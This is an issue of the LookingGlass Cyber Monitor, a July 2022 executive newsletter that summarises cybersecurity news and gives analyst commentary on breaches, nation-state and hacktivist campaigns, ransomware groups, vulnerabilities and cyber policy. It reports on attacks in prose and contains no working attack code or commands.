Strategic insights for leaders from tactical cyber observers.

As the world becomes increasingly dependent on the internet and cyberspace remains a contested environment, leaders must monitor geopolitical and cybersecurity risks more than ever. LookingGlass presents the Cyber Monitor – a weekly rollup of analysis and trending topics in cybersecurity for executives to keep abreast of threats, incidents, and risks to their organization and national security.

TABLE OF CONTENTS

OPERATIONAL UPDATES

CYBER EVENT READOUTS & NEWS AMPLIFICATIONS

On July 5, the US National Institute of Standards and Technology (NIST) selected the first set of quantum-resistant encryption algorithms to protect sensitive data from advanced cyberattacks. The four chosen encryption algorithms will be included in the NIST’s post-quantum cryptographic standard, which is expected to be completed in about two years. The CRYSTALS-Kyber algorithm was chosen by the agency for general encryption, which is used for access to secure websites. NIST chose three other algorithms for digital signatures: CRYSTALS-Dilithium, FALCON, and SPHINCS+. The agency stated that four additional algorithms are being considered for inclusion in the new cryptographic standard. NIST The Record

Hackers claimed to have stolen data from about 1B Chinese residents after breaching a Shanghai police database, in what industry experts are calling the country’s largest cybersecurity breach in history. The entity claiming the attack has offered to sell more than 23 TB of stolen data from the database, including names, addresses, birthplaces, national IDs, phone numbers, and criminal case information, according to an anonymous post on an online cybercrime forum. The unidentified hacker demanded 10 bitcoin (~$200k). The magnitude of the alleged leak has sent shockwaves through the Chinese security community. On July 4, Zhao Changpeng, the founder and CEO of cryptocurrency exchange Binance, tweeted that the company had discovered a breach of 1B resident records “from one Asian country,” without specifying which, and that it had since increased verification procedures for potentially affected users. The latest alleged incident highlighted the difficulties Beijing faces as it collects data on hundreds of millions of people while tightening controls on sensitive online content. It is unknown how the alleged cyberattackers in this month’s breach obtained access to Shanghai police servers. One popular theory among cybersecurity experts was that the breach was caused by a third-party cloud infrastructure partner. Bloomberg

Analyst Comment: LookingGlass analysis suggests that the actor that claimed to have stolen the data does not appear to be a native Chinese speaker and might not be familiar with China’s government structure.

Some online speculation suggests that the data leak is related to the investigation into high-ranking officers at the Shanghai Public Security Bureau. Gong Daoan (龚道安), the Secretary of the Party Committee of the Shanghai Public Security Bureau, and Shen Yuxin(沈与辛), the Secretary of the Party Committee of the Data Division of the Shanghai Public Security Bureau, were removed from their posts respectively in 2020 and 2021 over corruption-related charges. Because of Gong’s preference, Aliyun (Alibaba Cloud) was allegedly the cloud server service provider for Shanghai Public Security Bureau at the time.

The timing of the data leak is also noteworthy. This data leak occurred prior to the Chinese Communist Party’s 20th National Congress, which will be held in November 2022. Xi Jinping, the President of China, will secure a record-breaking third term as Communist Party Chairman during the National Congress. China’s authorities quickly censored online discussions about the breach. Although the data breach censorship may reflect Beijing’s increased sensitivity ahead of a political milestone, it is also consistent with Beijing’s usual response to criticism. With current evidence, it is difficult to determine the true nature of the data leak. LookingGlass analysis suggests that this data leak might be part of an information campaign to incite domestic tensions against the Chinese government.

China accused the US National Security Agency of conducting a cyberattack on Chinese scientific research organizations. The National Computer Virus Emergency Response Center in Beijing claimed that FoxAcid, a hacking program linked to the US National Security Agency (NSA), was discovered in hundreds of key information systems used by scientific research institutes. They also claimed that the attack could indicate the NSA’s preparations for larger-scale cyberwarfare. FoxAcid is a critical component of the NSA’s cyberespionage operations, particularly against China and Russia, and is used by the computer network exploitation team affiliated with the NSA’s Office of Tailored Access Operations (TAO), according to documents revealed by former NSA contractor Edward Snowden. It targets bugs in popular web browsers such as Microsoft Internet Explorer and Apple Safari in order to support cross-platform attacks. Since then, China has strengthened its information security infrastructure. Beijing introduced a new national cybersecurity standard known as “hierarchical protection 2.0” in 2019. The standard requires all public institutions to conduct regular drills to strengthen their cyberdefenses. However, universities and research institutes continue to be a source of concern. SCMP

Analyst Comment:  Noting that this piece was published by a Chinese news source, we assess there are significant exaggerations and misstatements in this messaging. China has a history of holding onto old information and releasing it later for strategic effect or signaling towards its adversaries. It is unclear if this piece was published at this time in response to an event or to strategically position China for future geopolitical events. This activity is consistent with the Chinese Communist Party’s military-civilian fusion (MCF) cyber strategy to strengthen China’s cyber resilience and achieve cyber sovereignty. It is also likely part of China’s strategic intent to both normalize their espionage behaviors and establish themselves as a cyber superpower that peers with the US.

Russian hackers conducted an attack on DTEK Group, Ukraine’s largest private energy conglomerate, according to the firm on Friday, July 1. A Russian-speaking hacking group known as XakNet claimed to have breached DTEK’s networks and posted screenshots on the Telegram app of purported DTEK data as proof. XakNet surfaced in March, according to a US and allied government advisory, and has claimed to target Ukrainian officials in support of Russia’s war. Alden Wahlstrom, a senior analyst at US cybersecurity firm Mandiant, stated XakNet has accessed data belonging to an organization that was likely hacked by a Russian cyber espionage group, suggesting a possible link between XakNet and the Russian government. The hacking incident coincided with the Russian shelling last week of a DTEK-owned thermal power plant in Kryvyi Rih, in central Ukraine, according to DTEK. Microsoft in an April report pointed out that Russian hacking has been used in tandem with kinetic military strikes. A cyberattack hit a Ukrainian broadcast company on March 1, the same day as a Russian missile strike against a TV tower in Kyiv, the report said. CNN

Analyst Comment: XakNet Telegram channel materialized in early March. While some other hacktivist groups, such as KillNet and their subordinate LEGION – Cyber Spetznaz appear to focus mostly on targeting organizations located in Europe and the USA, XakNet’s victims are often located in Ukraine, based on LookingGlass observations. In a recent interview with a pro-Russian infosec blogger Russian OSINT, XakNet claimed that at least some members of the group also participated in attacks targeting Georgia during the conflict in 2008. The group also stated that they chose the name “XakNet” as a tribute to an underground forum that was originally founded in 2007 and is no longer active. Many of the groups TTPs used during the war in Ukraine match the tactics that were used against Georgia in 2008, including DDoS and website defacement, highlighting the importance of lessons learned from past conflicts.

Back to the top

Malware used in crippling cyberattacks against the Iranian steel industry last week is connected to an attack that shut down the country’s rail system last year. In both cases, a malware strain was used to impact physical and critical infrastructure, according to a report from Check Point Research. The overlaps in the code, combined with context clues and recycled jokes, indicate that the same threat actor, dubbed Indra, is behind the attacks impacting Iran’s infrastructure. On June 27, a steel billet production line at the Khuzestan Steel Corporation began to malfunction. According to reports, sparks flew creating a fire in the heart of the plant. In a statement to the press, Khuzestan Steel’s CEO denied that any damage had been done. In both the steel and railway attacks, the perpetrators posted a notice instructing victims and passengers to call the phone number of the office of Ayatollah Khamenei. An executable (chaplin.exe) discovered in last week’s attack is a variant of malware identified as meteor, a wiper strain believed to be used in last year’s attack against Iran’s railway system. The researchers claimed that it was clear both variants shared a codebase. Threat Post

TRENDING TOPICS

Eclypsium researchers categorized vulnerabilities from CISA’s Known Exploited Vulnerabilities (KEV) Catalog in order to identify exploitation trends over the last 20 years and gain a better understanding of the types of assets and code that threat actors are most interested in:

  • Firmware (e.g. Intel AMT, Cisco, F5 Networks)
  • Server Software (e.g. Apache, Microsoft Exchange)
  • Operating Systems (e.g. Windows, Android)
  • Web Browser (e.g. Google Chrome, Internet Explorer)
  • Office applications (e.g.. Microsoft Word, Excel)
  • Applications (e.g. WinRAR, WhatsApp)
  • Software library (e.g. OpenSSL)
  • Virtualization (e.g. Docker, VMWare)

In terms of exploited vulnerabilities, firmware led the way (184), followed by server software (168), operating systems (161), web browsers (127), office applications (51), applications (43), software libraries (24), and virtualization (20). The data shows that firmware has consistently been an area of focus in cyberattacks, and it is up to security teams to build the processes to ensure the posture and integrity of their critical firmware, according to the researchers. Eclypsium

Known Exploited Vulnerabilities By Category

Analyst Comment: Firmware represents a large attack surface that can allow a stealthy attacker to compromise devices and launch devastating attacks. However, firmware security and updates are often overlooked by organizations. This research by Eclypsium demonstrates the importance of attack surface monitoring in relation to firmware.

Vulnerability coordination and bug bounty platform HackerOne on Friday, July 1, disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain. The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the company as of June 30. HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to “investigate a suspicious vulnerability disclosure” through an off-platform communication from an individual with the handle “rzlr” using “aggressive” and “intimidating” language. Subsequently, analysis of internal log data used to monitor employee access to customer disclosures traced the exposure to a rogue insider, whose goal was to re-submit duplicate vulnerability reports to the same customers using the platform to receive monetary payouts. In an incident report, HackerOne stated that the threat actor created a HackerOne sockpuppet account and had received bounties in a handful of disclosures. The report added that seven HackerOne customers received direct communication from the threat actor. The Hacker News HackerOne

Analyst Comment: This incident demonstrates the importance of insider threat monitoring. According to a Proofpoint report, both insider-led incidents and associated costs have been on the rise. While the incident at HackerOne happened to an insider with malicious intent, many insider threats are associated with careless behavior of employees, highlighting the importance of employee training and clearly defined policies that are consistently enforced.

CYBER ACTORS

NATION STATE ACTORS

The personal information of over 300k Israelis was leaked last month by an Iranian hacker group targeting Israeli travel booking sites. The group, named Sharp Boys, claimed it obtained data from Israeli tourism sites including ID numbers, addresses, credit card information, and more. Over 20 sites of travel agencies, hotels, and resorts were hacked, including hotel4u.co.il, hotels.co.il, isrotel.com, minihotel.co.il, trivago.co.il, and danhotels.com. According to reports, the information leaked included personal requests by Israeli customers to cancel planned vacations due to various health issues. “Wherever you go, even on your trips, you are under our control. Remember our name,” said Sharp Boys in a photo posted on their Telegram channel. The Sharp Boys hacker group first appeared in December when it announced it had hacked two Israeli hiking websites, leaking the information of 100k users and offering the information of around 3M people for sale. The group has not made or referenced any ransom demands in any of its attacks. The Jerusalem Post

Analyst Comment: While Sharp Boys is a newly discovered Iran-linked group, Israel is a frequent target of Iranaian cyber activity. Although no ransom demands were made in this case, LookingGlass has previously observed Iran-linked ransomware groups targeting organizations located in Israel and publishing their data on their leak sites.

Back to the top

A targeted attack campaign has been compromising home and small-business routers since late 2020 with the goal of hijacking network communications and infecting local computers with sophisticated backdoors. Attacks against home routers are not new, but the implants used by attackers in these cases were designed for local network reconnaissance and lateral movement instead of just abusing the router itself. Telecommunications company Lumen estimates that the attack campaign has compromised at least 80 routers and networks, primarily from North America and Europe and has seen signs of infections coming from routers made by ASUS, Cisco, DrayTek, and NETGEAR. However, the company’s researchers only managed to recover the exploit script used against a JCG-Q20 router. The attackers were seen using services by Chinese companies Alibaba and Tencent either to host files (Alibaba’s Yuque platform) or as redirectors for C2 (Tencent). Security experts have warned since the beginning of the COVID-19 pandemic that remote employees are easier to target inside their home networks because their work devices don’t benefit from the same levels of protection as when they’re behind corporate firewalls and routers. While the adoption and implementation of zero-trust network security principles can mitigate some of those risks, many organizations have been forced to do split network tunneling on their VPN clients to ease the burden on their VPN gateways and available bandwidth. Therefore, in many cases, a portion of non-critical or non-work-related traffic from the devices used by their remote employees continues to flow, potentially unencrypted, through those users’ home routers. CSO Online

Analyst Comment: Current evidence shows that the actors take additional procedures to hide their C2 infrastructure, such as transferring the initial exploit from a dedicated virtual private server and using routers as proxy C2s. Additionally, the actors would rotate proxy routers periodically to further avoid detection. The actions and TTPs observed in the campaign indicated that the group behind the operation is highly sophisticated and possibly linked to a state-sponsored group. It’s also noteworthy that the actors used both Chinese and Arabic to communicate as a means of practicing strong opsec. The final goal of this campaign remains unknown. As threat actors continue to evolve, small office/ home office (SOHO) will likely face additional cyber security challenges.

HACKTIVISTS

Norway’s National Security Authority (NSM) confirmed last week that some of the country’s most important websites and online services were taken down by a massive DDoS attack conducted by a pro-Russian group. NSM did not explicitly attribute the attacks to a threat actor, but the Pro-Russian Legion/Cyber Spetsnaz group published on its Telegram channel a list of Norwegian organizations to target. Similar attacks recently targeted the Lithuanian government, Italian organizations and government websites, and Romania for providing support to Ukraine. Now, Norwegian authorities confirmed that the attacks have hit large companies that offer essential services to the population. Based on the observed victims and close collaboration with several impacted organizations, the attacks primarily focused on the exploitation of poorly configured web servers and short-term disruptions. Proper hardening and implementation of WAF, along with DDoS protection, may preemptively resolve the issue as the total network attack pool of unique sources may be exhausted quickly. The logged sources of attacks showed how the attackers are actively using spoofed IP addresses and the deployment of tools on compromised IoT devices and hacked web resources. Experts believe the Pro-Russian group will continue to conduct attacks against Norway and other countries supporting Ukraine. Cybersecurity World Conference

Analyst Comment: Pro-Russian hacktivist groups have been targeting Ukraine, its allies, and any country assisting them since the beginning of Russia’s large-scale invasion of Ukraine in February 2022. LookingGlass assesses that while some attacks are opportunistic, other attacks coincide with current events. This particular activity took place around the same time Norway joined NATO. In another example, hacktivist groups targeted European transportation hubs, including airports and railways in response to European countries and the USA decisions to provide certain weapons to Ukraine. The timing of some of these attacks also coincided with Russia bombing transportation facilities in Ukraine. More recently KillNet and their affiliates have targeted Lithuania and Norway following the restrictions on Russian transport and transit of certain goods introduced by these countries. We must also note that coincidence does not always indicate correlation or causation.

Anonymous claimed it caught fake actors helping Killnet under the name of Anonymous; the collective has warned Killnet of impending consequences. The Russia-affiliated group Killnet has claimed to hack several Lithuanian government and public websites, taking responsibility on Telegram in a video message. The group stated the cyber-attacks were in response to Lithuania’s decision to impose sanctions on Russia, a move that follows the EU’s decision earlier this year to sanction the Kremlin after it invaded Ukraine. The pro-Russian hacker group has also demanded in the video to allow the transport of materials to Kaliningrad via Lithuania to avoid further interruption of government sites. Anonymous previously declared cyber war against pro-Russian hacker groups on their Twitter account and leaked over 360k government files. The Collective also successfully conducted DDoS attacks against Killnet and tracked the Anon hackers who helped Killnet secretly. The Tech Outlook

Twitter Anonymous 6.29.22

Analyst Comment: Both Anonymous and KillNet have been involved in the conflict between Russia and Ukraine since its early stages, with Anonymous supporting Ukraine, and KillNet supporting Russia. Earlier this year the groups declared a “cyber war” on each other. The groups have targeted each other with DDoS attacks and leaks. Direct confrontation between groups supporting different sides of an ongoing conflict is another noteworthy development in this ongoing conflict that may allow researchers to learn additional information about the threat actors, their affiliate members, motivations, and TTPs.

CYBERCRIME

Two different groups are impersonating the LockBit ransomware group – SolidBit and CryptOn. SolidBit is a variant of Yashma (aka. Chaos) ransomware. The group is reportedly working with the original developer of Yashma ransomware. Both SolidBit’s login and chat site look nearly identical to LockBit’s chat site, except the main color scheme was changed from red to green. Separately, CryptOn inserted the LockBit Ransomware 2.0 logo at the top of its site to disguise itself as LockBit, but it has not been confirmed whether it is actually using ransomware. Neither group has claimed any connection with LockBit although they both seem to be trying to exploit the LockBit ransomware group’s reputation. Medium.com

Lockbit and SolidBit

Analyst Comment: Hackers impersonating each other is a commonly used technique. Threat actors can impersonate each other for various reasons, including attempts to hide their true intent, TTPs, and identity. All threat actor types are capable of this activity; however, it has historically been attributed to nation state actors.

Back to the top

Microsoft Security Intelligence is warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto-miners. The 8220 threat actors are Chinese speaking and have been active since at least 2017 and are largely focused on crypto-mining campaigns. According to Microsoft researchers, the group has actively updated its techniques and payloads over the last year. In a recent campaign, the group targeted i686 and x86_64 Linux systems and used RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (WebLogic) for initial access. After gaining access to a target system, the actors download an evasive loader from jira[.]letmaker[.]top. The loader eludes detection by clearing log files and disabling cloud monitoring and security tools. It is used to download the pwnRig cryptominer (v1.41.0) and an IRC bot that runs commands from a C2 server. It maintains persistence by creating either a cron job or a script that runs every 60 seconds as nohup. Microsoft urges organizations to secure systems and servers, apply updates, and use good credential hygiene to protect their networks. Security Affairs

Analyst Comment: LookingGlass analysts have observed that the initial attacks exploiting CVE-2022-26134 appeared to come from China-linked APT groups, with the primary goal of dropping web shells. Additionally, in early June 2022, Chinese-language research on CVE-2022-26134 in Confluence servers was translated into Russian and shared on underground forums. LookingGlass assesses actors will continue to exploit CVE-2022-26134.

Ukrainian police arrested suspected members of a cyber-criminal gang conducting an EU payments phishing scheme. In a statement, Ukraine’s Cyber Police Department and the Kyiv-based Pechersk Police Department said the criminal group created and promoted roughly 400 phishing links to send to the county’s citizens. The links sent victims to malicious, fraudulent websites resembling EU resource pages. The phishing group disguised its scam as an EU social security payments scheme that Ukrainian residents could utilize after providing their bank card details. After the cybercriminals obtained a victim’s bank details, they compromised online-banking accounts and withdrew funds without permission. Specialists from the National Bank of Ukraine, who assisted in the investigation, say that over 5k citizens were defrauded, leading to losses of roughly $3.38M. In total, nine people have been arrested. Law enforcement also conducted searches of the suspects’ homes and seized computer equipment, mobile phones, bank cards, and cash. ZDNet

Malicious individuals are using stolen PII and voice and video deepfakes to secure remote IT, programming, database, and software-related jobs, the FBI warned last week. Deepfakes are created with deep machine learning algorithms and generative adversarial networks and are becoming increasingly difficult to detect. The FBI’s warning reveals a recent increase in complaints of individuals using deepfakes and stolen PII to apply for a variety of remote jobs and work-at-home positions, some of which include access to customer PII, financial data, corporate IT databases and/or proprietary information. These individuals are using stolen PII to bypass pre-employment background checks, and voice spoofing – or potentially voice deepfakes – during online interviews. The FBI highlighted that the actions and lip movement of those interviewed on-camera do not completely coordinate with the audio of the person speaking. While these discrepancies may be easy to notice, they are also easily dismissed due to the occasional volatility of audio and video communications. Organizations looking for IT professionals, programmers, software developers, and database administrators are advised to take extra precautions to ensure they are not ensnared by these and other attackers. Help Net Security

Analyst Comment: Malicious actors have used voice spoofing tactics long before this case. For example, in 2019, fraudsters used voice spoofing to target the CEO of a British company to facilitate an illegal funds transfer. Deepfakes can be used not only for committing fraud, but also for generation of fake social media profiles and video materials that can be utilized in disinformation campaigns.

The notorious REvil ransomware group likely resurfaced three months after its members were arrested by the Russian Federal Security Service (FSB) in January. The financially motivated ransomware group known as REvil emerged in 2019 and spread quickly after extorting $11M from the meat-processor JBS. The group would incentivize its affiliates to carry out cyberattacks for them by giving a percentage of the ransom pay-outs to those who help with infiltration activities on targeted computers. In January, the FSB said it seized more than 426M rubles and 500k euros, $600k in cash, cryptocurrency wallets, computers, and 20 high-end cars. More recently, cybersecurity researchers have put forward samples of REvil ransomware. They found that, based on samples showing identical creation dates and compilation strings, along with several other attributes, they had likely identified the original REvil ransomware developer, bolstering the assessment that REvil has returned. Moreover, in late April, security researchers found that malware used in previous attacks had resumed activity after a period of silence. Two researchers recently uncovered a blog on the dark web used to publish ransomware attacks enticing others to take part in the practice. They also came across news that attackers are seeking to recruit more ghost hackers. The Hacker News TechCrunch

Analyst Comment: REvil arrests in early 2022 initially may have seemed like a breakthrough in US-Russia coordination and cooperation in tracking down cybercriminals. However, from the start there were some questions that remain unanswered, including a lack of a noticeable change in REvil ransomware detections, according to ReversingLabs. Another curious fact was that the arrested REvil members were charged with “Illicit Circulation of Payment Methods” (Article 187.2 of Criminal Code of Russian Federation), as opposed to being charged with a crime related to information technology (Articles 272-274.1 of Criminal Code of Russian Federation). This led to ongoing speculation that the arrests only affected money mules involved in REvil money laundering operations. The recent REvil resurgence raises even more questions among security researchers, at the same time suggesting that Russia remains a safe haven for ransomware groups.

TECHNOLOGY

BLOCKCHAIN & WEB3

Researchers identified blockchain (BC) technology’s potential to address the top five challenges in Industry 5.0:

  1. Centralization: The current challenge is that systems are fragmented, and data storage is an issue. This has implications for network latency and computing capacity requirements. BC would address this challenge by establishing decentralized access, increased transparency, and low-cost processing power, among other benefits.
  2. Establishing Trust: Manufacturers are currently facing specific safety requirement challenges. This has implications for increased redundancy and platform reliance. Because the ledger’s immutability prevents tampering, BC would provide a solution to this problem.
  3. Security: The current issue involves unauthorized data access and modification. Data breaches, data loss, centralized servers, and single points of failure are all affected. With BC technology, databases would not be centralized, immutable record ledgers.
  4. Cost: The current challenge necessitates the use of middlemen, mediators, and a centralized system. This has cost and time implications, as well as a high risk of fraud and product duplication. The application of BC technology would result in a decentralized database and bitcoin payment processing.
  5. Transparency: The current challenge revolves around policies, standards, rules, and monitoring systems that are specific to each company. This has implications for poor customer relationships and decreased visibility. BC technology would address this issue by utilizing distributed ledger technology with a consensus method for transaction verification.

IEEE Xplore

The Italian Ministry of Economic Development has announced that certain blockchain projects will be eligible for up to $46M in government subsidies beginning in September 2022. The Ministry stated that companies and public/private research firms will be able to apply for government funding for the development of projects related to AI, IoT, and blockchain technology. The $46M budget is part of the Italian government’s goals for investments in technology, research, and innovation. Cointelegraph

Analyst Comment: This announcement demonstrates that governments of more and more countries embrace emerging technologies, including blockchain, despite a recent cryptocurrency crash. Blockchain technology, however, is not limited by cryptocurrency, meaning that these government subsidies may be used for development of other blockchain applications.

Back to the top

CRITICAL & EMERGING TECHNOLOGY

Researchers proposed a deep learning and IoT-based monitoring system to protect computer numerical control (CNC) machines from cyberattacks. The proposed infrastructure was used to monitor the cutting process while maintaining the cutting stability of CNC machines. A force sensor was installed in the milling CNC machine center to measure the vibration conditions for this purpose. An IoT architecture was designed to connect the sensor node and the cloud server via the message queue telemetry transport (MQTT) protocol to capture the real-time machine status. In order to keep the CNC machine in good working order, an improved model of DNN was designed to classify the different cutting conditions (i.e., stable cutting and unstable cutting). As a result, the developed deep learning model can accurately determine whether the smart sensor’s transmitted data via the internet is real cutting data or fake data caused by cyberattacks or inefficient sensor reading due to temperature, humidity, and noise signals. The proposed approach produced results indicating that deep learning can outperform other traditional machine learning methods for vibration control. Additionally, there were diverse scenarios presented to validate the effectiveness of the developed system, where it could automatically disconnect to secure the system when a cyberattack is detected and switch to the backup broker to continue the runtime operation. IEEE Xplore

SQL Server Scheme

Researchers have developed a novel chaotic encryption scheme-based blockchain system for an IoT environment. Traditional IoT systems enlist the help of a third party to secure sensitive data during transmission in an IoT environment, which can lead to complex and serious issues. Blockchain technology, according to the researchers, is the modern-day solution in an IoT environment for overcoming security issues and eliminating third-party involvement. In this paper, highly secure chaotic encryption is used to ensure that attackers cannot access sensitive information collected. Extensive experiments were carried out to validate the security of the proposed parameterized algorithm. This was accomplished through the use of bimodal chaotic scroller methodology to defeat Internet of Medical Things (IoMT) attacks such as brute force attacks. As a result, the blockchain that uses this chaotic encryption can improve the security of patient-sensitive data collected from IoT and enhance user privacy, according to the researchers. However, constraints such as limited computing resources and a lack of memory can prevent them from acting as blockchain hubs. Therefore, the proposed system necessitates improvisation in terms of attacking problems. The CES-based blockchain architecture for 5G enabled networks can be improved in the future by testing the security of images on the IoT network to make it more efficient and adaptable, according to researchers. IEEE Xplore

GOVERNANCE

USG UPDATES

The Department of Defense is offering rewards to ethical hackers who discover critical or severe vulnerabilities in the agency’s networks. The Pentagon’s first “Hack U.S.” program launched on Monday, July 4, in partnership with bug bounty platform HackerOne and under the auspices of the department’s vulnerability disclosure program. The pilot project began with a $110k budget. Researchers will be paid $1k for each flaw discovered and reported, plus an additional $500 for “high severity” flaws discovered. According to the DoD, hackers can also earn $3k for “additional specialty categories,” as well as a $5k grand prize bonus. The bug bounty is the Pentagon’s latest effort to thwart potential digital threats, particularly those posed by foreign adversaries such as Russia and China. The Record

Analyst Comment: It is worth noting that the grand prizes offered in the DoD’s program are relatively small compared to other programs, especially those operated by private sector tech giants. Apple, for example, offers hundreds of thousands of dollars to individual winners. And Google awarded nearly $9M to researchers who discovered bugs throughout 2021.

The US State Department announced rewards of up to $10M for information leading to the identification of anyone working for or on behalf of a foreign government to interfere with US elections through “illegal cyber activities.” The reward is being offered as the US prepares for this fall’s midterm elections. This is also the second time the US State Department has offered such a reward, following a similar $10M reward prior to the 2020 presidential elections. Risky Biz US Department of State

CISA has ordered federal agencies to patch CVE-2022-26925 by July 22. In May, CISA removed the CVE-2022-26925 Windows LSA (local security authority) vulnerability from its Known Exploited Vulnerabilities Catalog due to Active Directory (AD) certificate authentication problems observed after the installation of Microsoft’s May 2022 Patch Tuesday security updates. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, Federal Civilian Executive Branch agencies (FCEB) must address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts also recommend private organizations review the Catalog and address the vulnerabilities in their infrastructure. The flaw is a Windows LSA Spoofing vulnerability actively exploited in the wild. The vulnerability can be exploited by an unauthenticated attacker to force a domain controller to authenticate against another server using a New Technology Lan Manager (NTLM). Now the US organization added the CVE-2022-26925 to the catalog once again and ordered Federal agencies to fix the vulnerability by July 22. The agency also released guidance on applying June Microsoft patch Tuesday update for CVE-2022-26925. Security Affairs

Back to the top

GEOPOLITICS

Israel’s Defense Minister Benny Gantz accused Iran and its Lebanese proxy Hezbollah recently of attempting a cyberattack against a UN peacekeeping force in southern Lebanon in order to steal operational information. Gantz’s announcement came after a large cyberattack forced Iran’s state-owned Khuzestan Steel to halt production, and two other major steel producers reported being targeted as well. After several Israeli media outlets reported that Israel’s cyber units were likely behind the cyberattacks, the Israeli Defense Ministry said it would launch an internal investigation. According to officials, the hack and its attribution to Israel violate Israel’s “ambiguity policy.” Risky Biz The Times of Israel

LAW & DATA PRIVACY

An investigation discovered thousands of email records that revealed how Indian cyber mercenaries hacked parties involved in cases around the world, demonstrating how hired cyber spies have become the secret weapon of litigants seeking an edge. There were 35 cases in which Indian hackers attempted to obtain documents from one or both sides of a courtroom battle by sending them password-stealing emails. These hacking attempts targeted at least 75 US and European companies, three dozen advocacy and media groups, and numerous Western business executives. One example was aviation executive Farhad Azima, an Iranian-American who was found liable by a London court for cheating his former business partner, an investment fund based in the emirate of Ras Al Khaimah. But the case relied heavily on hacked emails that had mysteriously been posted to the web by an apparent whistleblower. Azima initiated his own investigation when Reuters contacted him. His legal team searched his and his colleagues’ inboxes and found 700 malicious emails in 16 months. The breach occurred in March 2016, according to Azima’s legal team. In legal filings, Azima’s lawyers accused Indian tech firms CyberRoot Risk Advisory Private Ltd and BellTroX Infotech Services Private Ltd of spying. CyberRoot’s hackers created anonymous websites to distribute Azima’s stolen emails, according to court documents. A former CyberRoot employee was quoted in one of the filings as saying the “Azima Exposed” sites were intended “to mimic a genuine whistleblower campaign in similar fashion to offshore leaks like the Panama Papers.” In March of last year, Azima won a retrial in his London case, with a three-judge panel at Britain’s Court of Appeal ruling that the revelations from India would necessitate a complete re-evaluation of the evidence supporting the hacking claim. “The hack-for-hire companies may be thousands of miles away, but the victims are often U.S. citizens on U.S. soil,” according to Azima. Reuters

Twitter asked an Indian court on Tuesday, July 5, to overturn some government orders to remove content from the social media platform in a legal challenge alleging official abuse of power, according to a source familiar with the matter. Twitter argued in a filing with the top court in the southern Indian state of Karnataka that some removal orders did not meet the procedural requirements of India’s IT act. The IT Act empowers the government to restrict public access to content for a variety of reasons, including national security. Twitter, which according to market research firms has nearly 24M users in India, also claimed in its filing that some of the orders failed to provide notice to content authors. Some were related to political content posted by official handles of political parties, the blocking of which amounts to a violation of free speech, according to the source. India, which ranks among the highest government requests for content takedowns, is considering changes to its new IT rules, including the establishment of a government-run appeals panel with the authority to overturn social media firms’ content moderation decisions. Reuters

With an amendment to its forthcoming comprehensive new online safety law, the UK will require app owners such as social media and search engines to combat “state-linked disinformation” or face fines. The Department for Digital, Culture, Media, and Sport announced that owners of platforms where users can post their own content will be required by law to prevent posts backed by foreign governments from “interfering with the UK.” The forthcoming Online Safety Bill gives Ofcom the authority to tax fines of up to 10% of their annual global sales if they fail to comply. Separately, on Tuesday, July 5, EU lawmakers approved landmark rules aimed at reigning in tech giants such as Google, Amazon, Apple, Facebook, and Microsoft. Along with the Digital Markets Act (DMA) rules, lawmakers also approved the Digital Services Act (DSA), which requires online platforms to do more to police the internet for illegal content. Companies will not be permitted to favor their own services over competitors’, nor will they be permitted to prevent users from removing pre-installed software or apps, two rules that will severely impact Google and Apple, according to an analyst. Bloomberg Reuters

Back to the top

Sign up for the Cyber Monitor